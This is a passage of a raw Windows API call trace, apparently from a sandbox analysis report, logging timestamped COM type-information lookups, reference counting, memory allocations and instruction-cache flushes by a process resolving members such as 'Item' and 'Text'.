riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2047c0 | out: ppvObject=0x2047c0*=0x0) returned 0x80004002 [0045.724] IUnknown:AddRef (This=0x7f723a0) returned 0x6 [0045.724] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f723a0, ppTypeAttr=0x204948, pDummy=0x40d1ce0 | out: ppTypeAttr=0x204948, pDummy=0x40d1ce0*=0x3b11360) returned 0x0 [0045.724] ITypeInfo:LocalReleaseTypeAttr (This=0x7f723a0) returned 0x0 [0045.724] IUnknown:Release (This=0x7f723a0) returned 0x5 [0045.724] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0045.724] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.724] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.724] GetCurrentProcess () returned 0xffffffffffffffff [0045.724] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x4c) returned 1 [0045.725] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0045.725] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f723a0, ppTypeAttr=0x203ee0, pDummy=0x0 | out: ppTypeAttr=0x203ee0, pDummy=0x0) returned 0x0 [0045.725] ITypeInfo:LocalReleaseTypeAttr (This=0x7f723a0) returned 0x0 [0045.725] IUnknown:Release (This=0x7f7aa08) returned 0x5 [0045.725] IUnknown:Release (This=0x7f7aa08) returned 0x4 [0045.725] IUnknown:QueryInterface (in: This=0x7f7aa08, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204458 | out: ppvObject=0x204458*=0x0) returned 0x80004002 [0045.725] IUnknown:AddRef (This=0x7f7aa08) returned 0x6 [0045.725] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7aa08, ppTypeAttr=0x204450, pDummy=0x10 | out: ppTypeAttr=0x204450, pDummy=0x10) returned 0x0 [0045.725] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7aa08) returned 0x0 [0045.725] ITypeInfo:GetRefTypeOfImplType (in: This=0x7f7aa08, index=0x0, pRefType=0x204448 | out: pRefType=0x204448*=0x3) returned 0x0 [0045.725] ITypeInfo:GetRefTypeInfo (in: This=0x7f7aa08, hreftype=0x3, ppTInfo=0x204460 | out: ppTInfo=0x204460*=0x8137308) returned 0x0 [0045.725] IUnknown:Release (This=0x7f7aa08) returned 0x5 [0045.725] ITypeInfo:RemoteGetTypeAttr (in: This=0x8137308, ppTypeAttr=0x204450, pDummy=0x204428 | out: ppTypeAttr=0x204450, pDummy=0x204428*=0x3) returned 0x0 [0045.725] ITypeInfo:LocalReleaseTypeAttr (This=0x8137308) returned 0x0 [0045.725] IUnknown:Release (This=0x8137308) returned 0x1 [0045.725] ITypeInfo:RemoteGetDocumentation (in: This=0x7f7aa08, memid=0, refPtrFlags=0x2044d0, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0045.725] IUnknown:Release (This=0x7f7aa08) returned 0x5 [0045.725] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Item", cchWideChar=5, lpMultiByteStr=0x2043e0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Item", lpUsedDefaultChar=0x0) returned 5 [0045.725] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Item") returned 0x107ad7 [0045.725] IUnknown:QueryInterface (in: This=0x7f7aa08, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2044e8 | out: ppvObject=0x2044e8*=0x0) returned 0x80004002 [0045.725] IUnknown:QueryInterface (in: This=0x7f7aa08, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2044e0 | out: ppvObject=0x2044e0*=0x0) returned 0x80004002 [0045.726] IUnknown:AddRef (This=0x7f7aa08) returned 0x5 [0045.726] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7aa08, ppTypeAttr=0x204738, pDummy=0x40d1da0 | out: ppTypeAttr=0x204738, pDummy=0x40d1da0*=0x4) returned 0x0 [0045.726] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7aa08) returned 0x0 [0045.726] IUnknown:Release (This=0x7f7aa08) returned 0x4 [0045.726] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0045.726] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.726] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.726] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.726] GetCurrentProcess () returned 0xffffffffffffffff [0045.726] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x54) returned 1 [0045.726] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0045.726] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7aa08, ppTypeAttr=0x203cd0, pDummy=0x0 | out: ppTypeAttr=0x203cd0, pDummy=0x0) returned 0x0 [0045.726] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7aa08) returned 0x0 [0045.726] IUnknown:Release (This=0x7f7aab8) returned 0x5 [0045.726] IUnknown:Release (This=0x7f7aab8) returned 0x4 [0045.726] IUnknown:AddRef (This=0x7f7aab8) returned 0x5 [0045.726] IUnknown:Release (This=0x7f7aab8) returned 0x4 [0045.726] IUnknown:QueryInterface (in: This=0x7f7aab8, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2047c8 | out: ppvObject=0x2047c8*=0x0) returned 0x80004002 [0045.726] IUnknown:QueryInterface (in: This=0x7f7aab8, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2047c0 | out: ppvObject=0x2047c0*=0x0) returned 0x80004002 [0045.726] IUnknown:AddRef (This=0x7f7aab8) returned 0x5 [0045.726] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7aab8, ppTypeAttr=0x204a18, pDummy=0x40d20a0 | out: ppTypeAttr=0x204a18, pDummy=0x40d20a0*=0x4) returned 0x0 [0045.726] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7aab8) returned 0x0 [0045.726] IUnknown:Release (This=0x7f7aab8) returned 0x4 [0045.726] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0045.726] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.726] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.726] GetCurrentProcess () returned 0xffffffffffffffff [0045.726] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x4c) returned 1 [0045.726] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0045.726] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7aab8, ppTypeAttr=0x203fb0, pDummy=0x0 | out: ppTypeAttr=0x203fb0, pDummy=0x0) returned 0x0 [0045.726] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7aab8) returned 0x0 [0045.727] IMalloc:Realloc (This=0x7feff045380, pv=0x8142e00, cb=0x2000) returned 0x8148620 [0045.727] IUnknown:Release (This=0x7f7ab68) returned 0x5 [0045.727] IUnknown:Release (This=0x7f7ab68) returned 0x4 [0045.727] IUnknown:QueryInterface (in: This=0x7f7ab68, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204228 | out: ppvObject=0x204228*=0x0) returned 0x80004002 [0045.727] IUnknown:AddRef (This=0x7f7ab68) returned 0x6 [0045.727] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7ab68, ppTypeAttr=0x204220, pDummy=0x10 | out: ppTypeAttr=0x204220, pDummy=0x10) returned 0x0 [0045.727] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7ab68) returned 0x0 [0045.727] ITypeInfo:GetRefTypeOfImplType (in: This=0x7f7ab68, index=0x0, pRefType=0x204218 | out: pRefType=0x204218*=0x3) returned 0x0 [0045.727] ITypeInfo:GetRefTypeInfo (in: This=0x7f7ab68, hreftype=0x3, ppTInfo=0x204230 | out: ppTInfo=0x204230*=0x8137308) returned 0x0 [0045.727] IUnknown:Release (This=0x7f7ab68) returned 0x5 [0045.727] ITypeInfo:RemoteGetTypeAttr (in: This=0x8137308, ppTypeAttr=0x204220, pDummy=0x2041f8 | out: ppTypeAttr=0x204220, pDummy=0x2041f8*=0x3) returned 0x0 [0045.727] ITypeInfo:LocalReleaseTypeAttr (This=0x8137308) returned 0x0 [0045.727] IUnknown:Release (This=0x8137308) returned 0x1 [0045.727] ITypeInfo:RemoteGetDocumentation (in: This=0x7f7ab68, memid=0, refPtrFlags=0x2042a0, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x8142df0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x8142df0*=0x0) returned 0x0 [0045.727] IUnknown:Release (This=0x7f7ab68) returned 0x5 [0045.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Text", cchWideChar=5, lpMultiByteStr=0x2041b0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Text", lpUsedDefaultChar=0x0) returned 5 [0045.727] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Text") returned 0x10abed [0045.727] IUnknown:QueryInterface (in: This=0x7f7ab68, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2042b8 | out: ppvObject=0x2042b8*=0x0) returned 0x80004002 [0045.727] IUnknown:QueryInterface (in: This=0x7f7ab68, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2042b0 | out: ppvObject=0x2042b0*=0x0) returned 0x80004002 [0045.727] IUnknown:AddRef (This=0x7f7ab68) returned 0x5 [0045.727] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7ab68, ppTypeAttr=0x204508, pDummy=0x40d2320 | out: ppTypeAttr=0x204508, pDummy=0x40d2320*=0x4) returned 0x0 [0045.728] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7ab68) returned 0x0 [0045.728] IUnknown:Release (This=0x7f7ab68) returned 0x4 [0045.728] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0045.728] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.728] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.728] GetCurrentProcess () returned 0xffffffffffffffff [0045.728] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x4c) returned 1 [0045.728] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0045.728] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7ab68, ppTypeAttr=0x203aa0, pDummy=0x0 | out: ppTypeAttr=0x203aa0, pDummy=0x0) returned 0x0 [0045.728] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7ab68) returned 0x0 [0045.728] IUnknown:QueryInterface (in: This=0x7f72088, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2048e8 | out: ppvObject=0x2048e8*=0x0) returned 0x80004002 [0045.728] IUnknown:QueryInterface (in: This=0x7f72088, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2048e0 | out: ppvObject=0x2048e0*=0x0) returned 0x80004002 [0045.728] IUnknown:Release (This=0x7f72138) returned 0x3 [0045.728] IUnknown:Release (This=0x7f72088) returned 0x3 [0045.728] IUnknown:AddRef (This=0x7f72138) returned 0x4 [0045.728] IUnknown:Release (This=0x7f72138) returned 0x3 [0045.728] IUnknown:QueryInterface (in: This=0x7f72138, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204778 | out: ppvObject=0x204778*=0x0) returned 0x80004002 [0045.728] IUnknown:QueryInterface (in: This=0x7f72138, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204770 | out: ppvObject=0x204770*=0x0) returned 0x80004002 [0045.728] IUnknown:QueryInterface (in: This=0x7f72088, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2047b0 | out: ppvObject=0x2047b0*=0x0) returned 0x80004002 [0045.728] IUnknown:QueryInterface (in: This=0x7f72088, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2047b8 | out: ppvObject=0x2047b8*=0x0) returned 0x80004002 [0045.728] IUnknown:QueryInterface (in: This=0x7f72088, riid=0x7fee40340f0*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2047a8 | out: ppvObject=0x2047a8*=0x7f72088) returned 0x0 [0045.728] ITypeInfo2:GetTypeKind (in: This=0x7f72088, pTypeKind=0x204804 | out: pTypeKind=0x204804*=5) returned 0x0 [0045.728] IUnknown:Release (This=0x7f72088) returned 0x4 [0045.729] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f72138, ppTypeAttr=0x2040b0, pDummy=0x0 | out: ppTypeAttr=0x2040b0, pDummy=0x0) returned 0x0 [0045.729] ITypeInfo:LocalReleaseTypeAttr (This=0x7f72138) returned 0x0 [0045.729] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f72088, ppTypeAttr=0x2040b0, pDummy=0x6 | out: ppTypeAttr=0x2040b0, pDummy=0x6) returned 0x0 [0045.729] ITypeInfo:LocalReleaseTypeAttr (This=0x7f72088) returned 0x0 [0045.729] IUnknown:Release (This=0x7f72138) returned 0x3 [0045.729] IUnknown:Release (This=0x7f72088) returned 0x3 [0045.729] IUnknown:AddRef (This=0x7f72138) returned 0x4 [0045.729] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f72138, ppTypeAttr=0x2049c8, pDummy=0x0 | out: ppTypeAttr=0x2049c8, pDummy=0x0) returned 0x0 [0045.729] ITypeInfo:LocalReleaseTypeAttr (This=0x7f72138) returned 0x0 [0045.729] IUnknown:Release (This=0x7f72138) returned 0x3 [0045.729] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0045.729] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.729] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.729] GetCurrentProcess () returned 0xffffffffffffffff [0045.729] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x4c) returned 1 [0045.729] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0045.729] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f72138, ppTypeAttr=0x203f60, pDummy=0x0 | out: ppTypeAttr=0x203f60, pDummy=0x0) returned 0x0 [0045.729] ITypeInfo:LocalReleaseTypeAttr (This=0x7f72138) returned 0x0 [0045.729] IUnknown:Release (This=0x7f723a0) returned 0x5 [0045.729] IUnknown:Release (This=0x7f722f0) returned 0x2 [0045.729] IUnknown:AddRef (This=0x7f723a0) returned 0x6 [0045.730] IUnknown:Release (This=0x7f723a0) returned 0x5 [0045.730] IUnknown:QueryInterface (in: This=0x7f723a0, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2047c8 | out: ppvObject=0x2047c8*=0x0) returned 0x80004002 [0045.730] IUnknown:QueryInterface (in: This=0x7f723a0, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2047c0 | out: ppvObject=0x2047c0*=0x0) returned 0x80004002 [0045.730] IUnknown:AddRef (This=0x7f723a0) returned 0x6 [0045.730] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f723a0, ppTypeAttr=0x204948, pDummy=0x40d2e30 | out: ppTypeAttr=0x204948, pDummy=0x40d2e30*=0x4) returned 0x0 [0045.730] ITypeInfo:LocalReleaseTypeAttr (This=0x7f723a0) returned 0x0 [0045.730] IUnknown:Release (This=0x7f723a0) returned 0x5 [0045.730] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0045.730] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.730] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.730] GetCurrentProcess () returned 0xffffffffffffffff [0045.730] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x4c) returned 1 [0045.730] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0045.730] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f723a0, ppTypeAttr=0x203ee0, pDummy=0x0 | out: ppTypeAttr=0x203ee0, pDummy=0x0) returned 0x0 [0045.730] ITypeInfo:LocalReleaseTypeAttr (This=0x7f723a0) returned 0x0 [0045.730] IUnknown:Release (This=0x7f7aa08) returned 0x5 [0045.730] IUnknown:Release (This=0x7f7aa08) returned 0x4 [0045.730] IUnknown:QueryInterface (in: This=0x7f7aa08, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204458 | out: ppvObject=0x204458*=0x0) returned 0x80004002 [0045.730] IUnknown:AddRef (This=0x7f7aa08) returned 0x6 [0045.730] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7aa08, ppTypeAttr=0x204450, pDummy=0x10 | out: ppTypeAttr=0x204450, pDummy=0x10) returned 0x0 [0045.730] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7aa08) returned 0x0 [0045.730] ITypeInfo:GetRefTypeOfImplType (in: This=0x7f7aa08, index=0x0, pRefType=0x204448 | out: pRefType=0x204448*=0x3) returned 0x0 [0045.730] ITypeInfo:GetRefTypeInfo (in: This=0x7f7aa08, hreftype=0x3, ppTInfo=0x204460 | out: ppTInfo=0x204460*=0x8137308) returned 0x0 [0045.730] IUnknown:Release (This=0x7f7aa08) returned 0x5 [0045.730] ITypeInfo:RemoteGetTypeAttr (in: This=0x8137308, ppTypeAttr=0x204450, pDummy=0x204428 | out: ppTypeAttr=0x204450, pDummy=0x204428*=0x3) returned 0x0 [0045.730] ITypeInfo:LocalReleaseTypeAttr (This=0x8137308) returned 0x0 [0045.730] IUnknown:Release (This=0x8137308) returned 0x1 [0045.730] ITypeInfo:RemoteGetDocumentation (in: This=0x7f7aa08, memid=0, refPtrFlags=0x2044d0, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0045.731] IUnknown:Release (This=0x7f7aa08) returned 0x5 [0045.731] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Item", cchWideChar=5, lpMultiByteStr=0x2043e0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Item", lpUsedDefaultChar=0x0) returned 5 [0045.731] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Item") returned 0x107ad7 [0045.731] IUnknown:QueryInterface (in: This=0x7f7aa08, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2044e8 | out: ppvObject=0x2044e8*=0x0) returned 0x80004002 [0045.731] IUnknown:QueryInterface (in: This=0x7f7aa08, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2044e0 | out: ppvObject=0x2044e0*=0x0) returned 0x80004002 [0045.731] IUnknown:AddRef (This=0x7f7aa08) returned 0x5 [0045.731] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7aa08, ppTypeAttr=0x204738, pDummy=0x40d30b0 | out: ppTypeAttr=0x204738, pDummy=0x40d30b0*=0x4) returned 0x0 [0045.731] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7aa08) returned 0x0 [0045.731] IUnknown:Release (This=0x7f7aa08) returned 0x4 [0045.731] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0045.731] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.731] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.731] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.731] GetCurrentProcess () returned 0xffffffffffffffff [0045.731] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x54) returned 1 [0045.731] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0045.731] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7aa08, ppTypeAttr=0x203cd0, pDummy=0x0 | out: ppTypeAttr=0x203cd0, pDummy=0x0) returned 0x0 [0045.731] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7aa08) returned 0x0 [0045.731] IUnknown:Release (This=0x7f7aab8) returned 0x5 [0045.731] IUnknown:Release (This=0x7f7aab8) returned 0x4 [0045.731] IUnknown:AddRef (This=0x7f7aab8) returned 0x5 [0045.731] IUnknown:Release (This=0x7f7aab8) returned 0x4 [0045.731] IUnknown:QueryInterface (in: This=0x7f7aab8, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2047c8 | out: ppvObject=0x2047c8*=0x0) returned 0x80004002 [0045.731] IUnknown:QueryInterface (in: This=0x7f7aab8, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2047c0 | out: ppvObject=0x2047c0*=0x0) returned 0x80004002 [0045.731] IUnknown:AddRef (This=0x7f7aab8) returned 0x5 [0045.731] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7aab8, ppTypeAttr=0x204a18, pDummy=0x40d33b0 | out: ppTypeAttr=0x204a18, pDummy=0x40d33b0*=0x4) returned 0x0 [0045.731] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7aab8) returned 0x0 [0045.731] IUnknown:Release (This=0x7f7aab8) returned 0x4 [0045.732] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0045.732] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.732] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.732] GetCurrentProcess () returned 0xffffffffffffffff [0045.732] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x4c) returned 1 [0045.732] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0045.732] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7aab8, ppTypeAttr=0x203fb0, pDummy=0x0 | out: ppTypeAttr=0x203fb0, pDummy=0x0) returned 0x0 [0045.732] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7aab8) returned 0x0 [0045.732] IUnknown:Release (This=0x7f7ab68) returned 0x5 [0045.732] IUnknown:Release (This=0x7f7ab68) returned 0x4 [0045.732] IUnknown:QueryInterface (in: This=0x7f7ab68, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204228 | out: ppvObject=0x204228*=0x0) returned 0x80004002 [0045.732] IUnknown:AddRef (This=0x7f7ab68) returned 0x6 [0045.732] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7ab68, ppTypeAttr=0x204220, pDummy=0x10 | out: ppTypeAttr=0x204220, pDummy=0x10) returned 0x0 [0045.732] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7ab68) returned 0x0 [0045.732] ITypeInfo:GetRefTypeOfImplType (in: This=0x7f7ab68, index=0x0, pRefType=0x204218 | out: pRefType=0x204218*=0x3) returned 0x0 [0045.732] ITypeInfo:GetRefTypeInfo (in: This=0x7f7ab68, hreftype=0x3, ppTInfo=0x204230 | out: ppTInfo=0x204230*=0x8137308) returned 0x0 [0045.732] IUnknown:Release (This=0x7f7ab68) returned 0x5 [0045.732] ITypeInfo:RemoteGetTypeAttr (in: This=0x8137308, ppTypeAttr=0x204220, pDummy=0x2041f8 | out: ppTypeAttr=0x204220, pDummy=0x2041f8*=0x3) returned 0x0 [0045.732] ITypeInfo:LocalReleaseTypeAttr (This=0x8137308) returned 0x0 [0045.732] IUnknown:Release (This=0x8137308) returned 0x1 [0045.732] ITypeInfo:RemoteGetDocumentation (in: This=0x7f7ab68, memid=0, refPtrFlags=0x2042a0, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x3ea4440 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x3ea4440*="") returned 0x0 [0045.732] IUnknown:Release (This=0x7f7ab68) returned 0x5 [0045.732] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Text", cchWideChar=5, lpMultiByteStr=0x2041b0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Text", lpUsedDefaultChar=0x0) returned 5 [0045.732] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Text") returned 0x10abed [0045.733] IUnknown:QueryInterface (in: This=0x7f7ab68, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), 